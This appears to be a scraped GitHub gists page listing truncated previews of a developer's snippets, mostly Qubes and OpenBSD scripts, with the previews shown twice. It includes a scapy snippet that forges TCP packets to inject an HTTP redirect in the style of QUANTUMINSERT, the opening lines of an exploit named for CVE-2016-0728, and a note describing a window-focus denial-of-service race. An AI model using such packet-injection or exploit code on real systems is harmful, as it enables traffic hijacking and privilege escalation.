Jean-Philippe Ouellet jpouellet

## fancy-debug.c
/*
 * depending on whether you use a named variadic macro or not you get either:
 *     fancy-debug.c:20:20: warning: ISO C does not permit named variadic macros
 * or
 *     fancy-debug.c:28:13: warning: ISO C99 requires rest arguments to be used
 * or sometimes both depending on your compiler.
 *
 * See also:
 *     http://gcc.gnu.org/onlinedocs/gcc-3.1/cpp/Standard-Predefined-Macros.html
 *     http://gcc.gnu.org/onlinedocs/cpp/Variadic-Macros.html

## qvm-filemanager.pl
#!/usr/bin/env perl

use strict;
use warnings;

sub open_file_manager {
	my $vm = shift;
	exec {'qvm-run'} ('qvm-run', '--', $vm, 'exec nautilus --new-window --no-desktop </dev/null >/dev/null') or die "qvm-run exec failed\n";
}

## openbsd-next.sh
#/usr/bin/env -i /bin/ksh

set -e

d=$(mktemp -d)
installurl=$(cat /etc/installurl)
ver=snapshots # uname -r
arch=$(machine)
baseurl="$installurl/$ver/$arch"

## README.md

      
              6 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                jpouellet
                / README.md
            
            
              Last active
              June 18, 2018 10:29
            
              
                OpenBSD kernel testing automation
              
          
    This assumes you have:

a development machine, here called "dev"
a device under test, here called "dut"
a serial console to dut
network access from dut to dev
the same arch dev and dut

You may need to change:

GENERIC (in dev:.ssh/authorized_keys) to something else, e.g. maybe GENERIC.MP


## cve_2016_0728.c
/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>

## mimeapps.list
[Added Associations]
image/png=qubes-movetovm.desktop;

## jpo.WriteUSB
#!/bin/bash

if [ $# -eq 0 ]; then
	dev=/dev/sda
else
	# Protected by arg-specific qubes-rpc policy.
	dev=/dev/"$1"
fi

if ! [ -b "$dev" ]; then

## QUANTUMINSERT.py
FOXACID = 'www.openbsd.org'

def QUANTUMINSERT(p):
   p.show()
   if Raw in p and p['Raw'].load.startswith('GET /') and p['Raw'].load.endswith('\r\n\r\n'):
      ip = IP(flags='DF', src=p['IP'].dst, dst=p['IP'].src)
      tcp = TCP(sport=p['TCP'].dport, dport=p['TCP'].sport, flags='PA', seq=p['TCP'].ack, ack=p['TCP'].seq + len(p['Raw'].load))
      http = 'HTTP/1.1 307 Temporary Redirect\r\nLocation: http://'+FOXACID+'/\r\nConnection: close\r\n\r\n'
      out = ip / tcp / http
      print '[*OUT*]'

## qubes-shutdown-focused.sh
#!/bin/sh

# PROBLEM: Allows the front VM to close its focused window right before
# keystroke delivery, leading to shutting down the VM with the window in
# back. Effective denial of service.

set -e

front=$(xprop -notype -root _NET_ACTIVE_WINDOW | awk '{if (match($0,"^_NET_ACTIVE_WINDOW: window id # (0x[0-9a-f]*), 0x0$",m)){print m[1];} exit 0;}' )
test -n "$front"

## idle-watcher.py
#!/usr/bin/python
# -*- encoding: utf8 -*-
#
# The Qubes OS Project, http://www.qubes-os.org
#
# Copyright (C) 2015 Marek Marczykowski-Górecki
#                              <marmarek@invisiblethingslab.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
	/*
	* depending on whether you use a named variadic macro or not you get either:
	* fancy-debug.c:20:20: warning: ISO C does not permit named variadic macros
	* or
	* fancy-debug.c:28:13: warning: ISO C99 requires rest arguments to be used
	* or sometimes both depending on your compiler.
	*
	* See also:
	* http://gcc.gnu.org/onlinedocs/gcc-3.1/cpp/Standard-Predefined-Macros.html
	* http://gcc.gnu.org/onlinedocs/cpp/Variadic-Macros.html
	#!/usr/bin/env perl

	use strict;
	use warnings;

	sub open_file_manager {
	my $vm = shift;
	exec {'qvm-run'} ('qvm-run', '--', $vm, 'exec nautilus --new-window --no-desktop </dev/null >/dev/null') or die "qvm-run exec failed\n";
	}
	#/usr/bin/env -i /bin/ksh

	set -e

	d=$(mktemp -d)
	installurl=$(cat /etc/installurl)
	ver=snapshots # uname -r
	arch=$(machine)
	baseurl="$installurl/$ver/$arch"
	/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
	/* $ ./cve_2016_072 PP_KEY */

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <sys/types.h>
	#include <keyutils.h>
	#include <unistd.h>
	#include <time.h>
	#!/bin/bash

	if [ $# -eq 0 ]; then
	dev=/dev/sda
	else
	# Protected by arg-specific qubes-rpc policy.
	dev=/dev/"$1"
	fi

	if ! [ -b "$dev" ]; then
	FOXACID = 'www.openbsd.org'

	def QUANTUMINSERT(p):
	p.show()
	if Raw in p and p['Raw'].load.startswith('GET /') and p['Raw'].load.endswith('\r\n\r\n'):
	ip = IP(flags='DF', src=p['IP'].dst, dst=p['IP'].src)
	tcp = TCP(sport=p['TCP'].dport, dport=p['TCP'].sport, flags='PA', seq=p['TCP'].ack, ack=p['TCP'].seq + len(p['Raw'].load))
	http = 'HTTP/1.1 307 Temporary Redirect\r\nLocation: http://'+FOXACID+'/\r\nConnection: close\r\n\r\n'
	out = ip / tcp / http
	print '[OUT]'
	#!/bin/sh

	# PROBLEM: Allows the front VM to close its focused window right before
	# keystroke delivery, leading to shutting down the VM with the window in
	# back. Effective denial of service.

	set -e

	front=$(xprop -notype -root _NET_ACTIVE_WINDOW \| awk '{if (match($0,"^_NET_ACTIVE_WINDOW: window id # (0x[0-9a-f]*), 0x0$",m)){print m[1];} exit 0;}' )
	test -n "$front"
	#!/usr/bin/python
	# -- encoding: utf8 --
	#
	# The Qubes OS Project, http://www.qubes-os.org
	#
	# Copyright (C) 2015 Marek Marczykowski-Górecki
	# <marmarek@invisiblethingslab.com>
	#
	# This program is free software; you can redistribute it and/or
	# modify it under the terms of the GNU General Public License